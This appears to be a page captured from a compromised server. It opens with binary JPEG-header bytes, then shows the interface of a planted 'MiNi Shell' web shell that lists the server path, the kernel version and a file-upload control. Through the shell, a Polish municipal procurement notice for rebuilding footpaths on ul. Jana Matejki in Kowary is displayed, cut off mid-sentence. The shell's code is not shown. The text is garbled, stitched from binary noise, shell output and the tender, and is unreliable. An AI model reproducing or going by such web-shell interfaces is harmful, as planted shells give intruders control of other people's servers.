JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220929/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220929/0036944301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Odsklepienie powierzchni nieprzepuszczalnych - Przebudowa ciągu komunikacyjnego ul. Jana Matejki&#34; - III etap </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA KOWARY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821598</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 1 Maja 1 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kowary</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-530</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bok@kowary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.kowary.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odsklepienie powierzchni nieprzepuszczalnych - Przebudowa ciągu komunikacyjnego ul. Jana Matejki&#34; - III etap </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-184affd5-3e4f-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00369443</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033328/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Zielono - niebieskie Kowary zadanie dofinansowane ze środków Mechanizmu Finansowego EOG 2014-2021 w ramach programu:„Środowisko, Energia i Zmiany klimatu” obszar programowy: Klimat</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.kowary.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Rejestracja na platformie, w tym <br/>złożenie oferty w formie elektronicznej, a także warunki techniczne dotyczące korzystania z Platformy zostały określone w <br/>Regulaminie e-Zamowienia, dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób <br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z04.05.2016, str. 1),dalej „RODO”, informuję, <br/>że: Administrator, dane kontaktowe Urząd Miasta Kowary, ul. 1 Maja 1a, 58-530 Kowary: • na adres poczty elektronicznej: <br/>bok@kowary.pl, • telefonicznie: +48 7564 39 222, • <br/>pisemnie lub osobiście: na adres wskazany powyżej, w Urzędzie Miasta Kowary został wyznaczony Inspektor Ochrony Danych, z <br/>którym można się skontaktować: • za pomocą poczty elektronicznej: iod@kowary.pl <br/>Cele przetwarzania,podstawa prawna przetwarzania, czas przechowywania poszczególnych kategorii danych: Dane będą <br/>przetwarzane przez Urząd Miasta i Kowary wyłącznie w celu związanym z postępowaniem o udzielenie zamówienia publicznego na podstawie: • art. 6 ust. 1 lit. c) i e) RODO na podstawie Ustawy z dnia 11września 2019r. prawo zamówień publicznych. Dane będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,okres przechowywania obejmuje cały czas trwania umowy. Dane mogą zostać udostępnione osobom lub podmiotom, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ustawy z dnia 11 września 2019 r. prawo zamówień <br/>publicznych. Prawa osoby, której dane dotyczą: Przysługujące prawa: • na podstawie art. 15 RODO prawo dostępu <br/>do danych osobowych; • na podstawie art. 16 RODO prawo do sprostowania*; • na podstawie art. 18 RODO prawo żądania od <br/>administratora ograniczenia przetwarzania danych osobowych z <br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; • prawo do wniesienia skargi do Prezesa Urzędu Ochrony <br/>Danych Osobowych. Prawa nie mające zastosowania: • w związku z art. 17 <br/>ust. 3 lit. b,d lub e RODO prawo do usunięcia danych osobowych; • prawo do przenoszenia danych osobowych, o którym mowa w <br/>art. 20 RODO; • na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną <br/>przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. * Wyjaśnienie: skorzystanie z prawa do sprostowania nie może <br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia <br/>publicznego w zakresie niezgodnym z ustawą.** **Wyjaśnienie: W postępowaniu o <br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRM.271.79.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Odsklepienie powierzchni nieprzepuszczalnych - Przebudowa ciągu komunikacyjnego ul. Jana Matejki&#34; - III etap” <br/>Zamówienie jest realizowane w ramach Projektu: „Zielono-niebieskie Kowary”, który jest dofinansowany ze środków <br/>Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego na lata 2014-2021 w ramach Programu „Środowisko, Energia i Zmiany Klimatu”, obszar programowy: Klimat. <br/>Etap I robót budowlanych został przez Urząd Gminy Miejskiej Kowary zrealizowany pod nazwą: Przebudowa ulic: <br/>Słonecznej, Bielarskiej, Matejki oraz przebudowa dróg wewnętrznych i ciągów komunikacyjnych z budową miejsc <br/>postojowych przy ul. Matejki, Bielarskiej wraz z budową kanalizacji deszczowej – etap I ( <br/>http://www.bip.kowary.pl/public/id=55309&amp;id_document=16661 ). <br/>Etap II robót budowlanych został przez Urząd Gminy Miejskiej Kowary zrealizowany pod nazwą: Przebudowa ciągów <br/>komunikacyjnych przy ul. Matejki wraz z budową kanalizacji deszczowej – etap II G-J przebudowa ul. Słonecznej odcinek od. Ul. Bielarskiej do garaży przy ul. Słonecznej (http://www.bip.kowary.pl/public/?id=55309&amp;id_document=20530 ).<br/>2.Przedmiot zamówienia obejmuje wykonanie robót budowlanych w zakresie przebudowy ciągu komunikacyjnego ul. Jana Matejki – III etap - piesze ścieżki na osiedlu w centrum miasta, usuniecie asfaltu. Ścieżki powstaną z przepuszczalnej <br/>podbudowy i kostki brukowej ekologicznej, przepuszczalnej dla wody. Powierzchnia chodników - odsklepienia asfaltu – <br/>około 762 m2. Przedmiot zamówienia należy wykonać zgodnie z Opisem Przedmiotu Zamówienia, na który składają się <br/>m.in. Załączniki nr 10-12 do SWZ oraz zapisami projektu umowy zawartymi w Załączniku nr 5 do SWZ. <br/>Zamówienie obejmuje: <br/>A. Wykonanie robót przygotowawczych i rozbiórkowych: <br/>• roboty pomiarowe, <br/>• rozbiórka nawierzchni płytek betonowych 30*30 cm z wywozem i utylizacją, <br/>• rozbiórka nawierzchni asfaltowo-betonowej wraz z wywozem i utylizacją, <br/>• rozbiórka schodów betonowych z wywozem i utylizacją, <br/>• rozbiórka obrzeży betonowych wraz z ławami betonowymi, z wywozem i utylizacją. <br/>B. Wykonanie podbudowy: <br/>• roboty ziemne - wykonanie korytowania pod chodniki z wywozem i utylizacją urobku, <br/>• wykonanie warstwy odsączającej z piasku o gr. 10 cm po zagęszczeniu, <br/>• wykonanie podbudowy z kruszyw łamanego 0/31,5mm o gr. 15cm po zagęszczeniu. <br/>C. Wykonanie nawierzchni: <br/>• ułożenie obrzeży betonowych na ławie betonowej wraz z oporem, <br/>• wykonanie nawierzchni chodników z kostki szarej „eko” (z odstępnikami) gr. 8cm, na podsypce cementowo-piaskowej. <br/>D. Wykonanie odwodnienia: <br/>• wykonanie wykopów liniowych pod rurociąg, <br/>• ułożenie rur PVC kanalizacji deszczowej, <br/>• montaż studzienki ściekowej betonowej z wpustem żeliwnym, <br/>• montaż odwodnienia liniowego na ławie betonowej. <br/>E. Wykonanie robót wykończeniowych: <br/>• regulacja pionowa studni kanalizacyjnych, <br/>• uporządkowanie terenów zielonych – humusowanie wraz z obsiewem (trawniki i za krawężnikami). <br/>F. Opracowanie projektu tymczasowej organizacji ruchu na czas robót. <br/>G. Zapewnienie nadzoru konserwatorskiego zgodnie z decyzją nr 2297/17 z dni 27.11.2017 r. wydaną przez Dolnośląskiego Konserwatora Zabytków Delegatura w Jeleniej Górze, ul. 1 Maja 23, 58-500 Jelenia Góra. <br/>H. Opracowanie kompletnej dokumentacji powykonawczej (w tym – geodezyjnej) dla potrzeb uzyskania przez <br/>Zamawiającego decyzji o pozwoleniu na użytkowanie. <br/>3. Szczegółowy opis robót budowlanych stanowiących przedmiot zamówienia określa dokumentacja projektowa <br/>obejmująca: <br/>a) Projekt budowlany oraz wykonawczy – Załącznik nr 10 do SWZ, <br/>b) Przedmiar Robót – Załącznik nr 11 do SWZ ( UWAGA: Zamawiający udostępnia przedmiar robót jedynie w celach <br/>informacyjnych, zakres przedmiotu zamówienia należy wycenić na podstawie całości dokumentów składających się na <br/>SWZ, w tym w szczególności na podstawie dokumentacji projektowej), <br/>c) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych– Załącznik nr 12 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór najkorzystniejszej oferty zostanie dokonany w oparciu o następujące kryteria: <br/>1. Kryterium cena brutto przedmiotu zamówienia – 60%. <br/>Oferta z najniższą ceną spośród ofert nieodrzuconych otrzyma 60 punktów. Pozostałe proporcjonalnie mniej, według formuły: <br/>Pc = (Cmin /Co) * 60 <br/>Pc – ilość punktów ofert badanej w kryterium cena <br/>Cmin – cena brutto oferty z najniższą cenę spośród wszystkich ważnych ofert, <br/>Co – cena brutto badanej oferty. <br/>Ilość punktów będzie obliczana do dwóch miejsc po przecinku. Oferta może otrzymać maksymalnie 60 pkt. <br/><br/>2. Kryterium gwarancji dla przedmiotu zamówienia – 40% <br/>2.1. Zamawiający wymaga udzielenia min. 36 miesięcznej gwarancji licząc od dnia podpisania protokołu odbioru końcowego robót budowlanych. <br/>W ramach kryterium - „okres gwarancji” Zamawiający przyzna punkty za zaoferowany dodatkowy okres gwarancji na wykonany <br/>przedmiot zamówienia wg następujących zasad: <br/><br/>Zaoferowany okres gwarancji Liczba punktów <br/>brak dodatkowego okresu gwarancji lub zaoferowany dodatkowy okres gwarancji poniżej 12 miesięcy(wymagany okres gwarancji <br/>wynosi min. 36 miesięcy) 0 pkt <br/>12 miesięcy dodatkowego okresu gwarancji (tj. łącznie 48 miesięcy) lub zaoferowany dodatkowy okres gwarancji krótszy niż 24 <br/>miesiące 20pkt <br/>24 miesiące dodatkowego okresu gwarancji lub więcej (tj. łącznie 60 miesięcy i więcej) 40 pkt <br/>2.2. Wymagany okres gwarancji na wykonany przedmiot umowy wynosi min. 36 miesięcy od dnia podpisania protokołu odbioru <br/>końcowego robót budowlanych i nie jest punktowany. Wykonawca, który zaoferuje dodatkowy okres gwarancji dłuższy niż 36 <br/>miesięcy, otrzyma dodatkowe punkty wg wyżej wskazanej tabeli. Za zaoferowany okres gwarancji powyżej 60 miesięcy, Wykonawca otrzyma 40 punktów. W przypadku zaoferowania dodatkowego okresu gwarancji poniżej 12 miesięcy, Wykonawca otrzyma 0 pkt. <br/>3. Łączna liczba punktów badanej oferty będzie liczona według poniższego wzoru: <br/>P = C + G <br/>P- łączna ilość punktów badanej oferty <br/>C – ilość punktów badanej oferty w kryterium oceny &#34;cena&#34; <br/>G – ilość punktów badanej oferty w kryterium oceny &#34;okres gwarancji&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: <br/>a) zdolności do występowania w obrocie gospodarczym, <br/>Opis sposobu dokonywania oceny spełniania tego warunku: <br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana <br/>będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści <br/>oświadczenia Wykonawcy. <br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, <br/>Opis sposobu dokonywania oceny spełniania tego warunku: <br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana <br/>będzie na podstawie ogólnego oświadczenia o spełnianiu warunków udziału w postępowaniu, zawartego w treści <br/>oświadczenia Wykonawcy, <br/>c) sytuacji ekonomicznej lub finansowej, <br/>Opis sposobu dokonywania oceny spełniania tego warunku: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawcy wykażą, że są ubezpieczeni od odpowiedzialności cywilnej w <br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszej niż <br/>120.000,00 zł; <br/>d) zdolności technicznej lub zawodowej, <br/>Opis sposobu dokonywania oceny spełniania tego warunku: <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: <br/>1) w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy <br/>– w tym okresie): wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną z zakresu: budowy lub przebudowy lub rozbudowy lub remontu ciągu komunikacyjnego obejmującego co najmniej <br/>wykonanie podbudowy oraz chodnika z kostki o wartości tego zadania minimum 120.000,00 zł brutto z podaniem jej rodzaju, wartości, daty i miejsca wykonania oraz z załączeniem dowodów określających, czy ta robota budowlana została wykonana zgodnie z przepisami prawa budowlanego i prawidłowo ukończona, przy czym dowodami, o których mowa, są referencje <br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z <br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne <br/>dokumenty. <br/>2) w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże i udokumentuje, że dysponuje lub będzie dysponował minimum 1 osobą pełniącą funkcję kierownika <br/>budowy posiadającą: <br/>a) uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń oraz <br/>b) w ciągu ostatnich 10 lat doświadczenie w kierowaniu ( na stanowisku kierownika budowy lub kierownika robót drogowych) co najmniej jedną budową lub robotą budowlaną obejmującą remont lub przebudowę lub rozbudowę lub budowę ciągu <br/>komunikacyjnego obejmującego co najmniej wykonanie podbudowy oraz chodnika z kostki. <br/>Uwaga: <br/>Ad.1) Dla potrzeb oceny spełniania warunków, jeżeli wartości zostaną podane w walutach innych niż PLN, Zamawiający <br/>przyjmie średni kurs PLN dla tej waluty podawany przez NBP w dniu publikacji ogłoszenia o zamówieniu. <br/>Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał <br/>wykazanego zakresu prac. Wykonawca ten może powołać się na doświadczenie grupy wykonawców, której był członkiem <br/>pod warunkiem, że faktycznie i konkretnie uczestniczył w wymaganym zakresie w realizacji wykazanej części zamówienia. <br/>Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienie w zakresie faktycznie i konkretnie <br/>wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowa konsorcjum, z której wynika zakres <br/>obowiązków czy wystawionych przez Wykonawcę faktur. <br/>Ad.2) Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza <br/>odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy z dnia 07 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021 r., poz.2351 z późn. zm.) oraz Ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r. poz. 1646). Za uprawnienia budowlane odpowiadające <br/>wyżej określonym uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych <br/>środków dowodowych, które wykonawca składa w postępowaniu na wezwanie zamawiającego na potwierdzenie okoliczności, o <br/>których mowa w art. 108 ust.1 i 109 ust. 1 pkt 1, 4 ustawy pzp: <br/>a) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej w <br/>rozumieniu ustawy z dnia 16 lutego 2007 o ochronie konkurencji i 